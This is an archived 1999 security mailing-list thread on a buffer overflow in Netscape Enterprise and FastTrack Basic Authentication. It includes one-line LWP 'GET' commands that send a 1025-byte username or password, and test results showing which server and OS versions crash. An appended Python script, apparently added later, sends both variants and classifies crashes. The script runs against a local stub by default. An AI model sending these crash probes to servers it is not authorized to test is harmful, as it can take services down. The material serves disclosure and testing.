Some more data. Using LWP's "GET" as follows:

$ GET -C `perl -e 'print "A"x1025'`:password http://hostname:port

Netscape FastTrack 3.0.1 on NT: crashes
Admin Server 3.5 on NT: crashes
Netscape FastTrack 3.0.2 on Irix 6.x: no problem
Admin Server 3.5 on Irix 6.x: no problem
Netscape Enterprise 3.6sp2 on Irix 6.x: no problem

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsidesat_private

On Thu, 2 Dec 1999, Doug Monroe wrote:

> RE:
> > ISS Security Advisory
> > December 1, 1999
> > Buffer Overflow in Netscape Enterprise and FastTrack Authentication
> > Procedure
>
> I made a few simple pokes with variants of perl LWP's 'GET' function at
> areas of 2 NES 3.x servers that are protected with Basic Authentication.
> For example-
> $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
> $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
>
> Solaris 2.6/NES 3.5.1 (and 3.6.3)-
> username:LONGpw -> http://server/private-path - NO KILL
> LONGusername:pw -> http://server/private-path - NO KILL
>
> NT4/SP4/NES 3.6.2-
> username:LONGpw -> http://server/private-path - NO KILL
> LONGusername:pw -> http://server/private-path - KILL
>
> Potentially important diffs/notes:
> On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
> ACL.
> On the NT, the private area was protected using local-db ACL, not NCSA-style.
> I have not tried poking a local-db/LDIF protected area on Solaris.
> I have not tried poking a .nsconfig/NCSA-style area on NT.
> I have not tried poking at the admin server of either box.
> --
> Doug Monroe
> www.interhack.net
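The two "GET -C" invocations in the thread both come down to one thing: an Authorization: Basic header whose decoded user:password string carries a 1025-byte field. The script below is an added example (not posted by either author, and not part of the ISS advisory); it builds that header itself over a raw socket so every byte sent is known, runs the same two variants Doug Monroe used (oversized password, then oversized username), and classifies each outcome the way the thread does: a status line back means NO KILL, a dropped connection or silence means a KILL candidate, and "refused" means the listener was already gone when the second variant was tried. The host, port, path and the stub 401 server it runs against by default are assumptions made so the script runs offline; pointing it at a real server means replacing those values, and only against a server you are authorized to test.

```python
import base64
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# The oversized field from the thread: perl -e 'print "A"x1025'
LONG = "A" * 1025


def basic_auth_header(username, password):
    """The Authorization line LWP's 'GET -C user:pass' would send."""
    creds = f"{username}:{password}".encode("latin-1")
    return "Authorization: Basic " + base64.b64encode(creds).decode("ascii")


def decode_basic(header_line):
    """Inverse of basic_auth_header, to check what a server would decode."""
    b64 = header_line.split(" ", 2)[2]
    user, _, pw = base64.b64decode(b64).decode("latin-1").partition(":")
    return user, pw


def build_request(host, path, username, password):
    """A minimal HTTP/1.0 request so we control every byte on the wire."""
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"{basic_auth_header(username, password)}\r\n"
        "User-Agent: basic-auth-length-probe\r\n"
        "\r\n"
    ).encode("ascii")


def probe(host, port, path, username, password, timeout=5.0):
    """Send one request and classify the outcome:
    'status <code>'      server answered (NO KILL)
    'connection dropped' closed without a status line (KILL candidate)
    'timeout'            nothing came back (hung or dead child)
    'refused'            nothing listening (killed by an earlier probe?)
    """
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_request(host, path, username, password))
            while b"\r\n" not in data:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    except ConnectionRefusedError:
        return "refused"
    except socket.timeout:
        return "timeout"
    except (ConnectionResetError, BrokenPipeError):
        return "connection dropped"
    parts = data.split(b"\r\n", 1)[0].split(None, 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "connection dropped"
    return "status " + parts[1].decode("ascii", "replace")


def run_matrix(host, port, path):
    """The thread's two variants, in the order Doug Monroe ran them.
    If the first one kills the server, the second reports 'refused'."""
    return {
        "username:LONGpw": probe(host, port, path, "username", LONG),
        "LONGusername:pw": probe(host, port, path, LONG, "password"),
    }


class _StubHandler(BaseHTTPRequestHandler):
    """Assumed stand-in for a server that survives the long field: it just
    returns 401 with a Basic challenge, whatever the header length."""
    protocol_version = "HTTP/1.0"

    def do_GET(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="private"')
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def run_local_demo(path="/private-path"):
    """Run the matrix against the stub on an ephemeral loopback port."""
    srv = HTTPServer(("127.0.0.1", 0), _StubHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return run_matrix("127.0.0.1", srv.server_address[1], path)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for variant, outcome in run_local_demo().items():
        print(f"{variant:<16} -> {outcome}")
```

Against the stub both variants come back as "status 401"; against a server that dies on the long username the second line would read "connection dropped" or "timeout", and anything probed after that reads "refused" until the server is restarted, which is why the two variants are kept in a fixed order and probed one at a time.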
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:53 PDT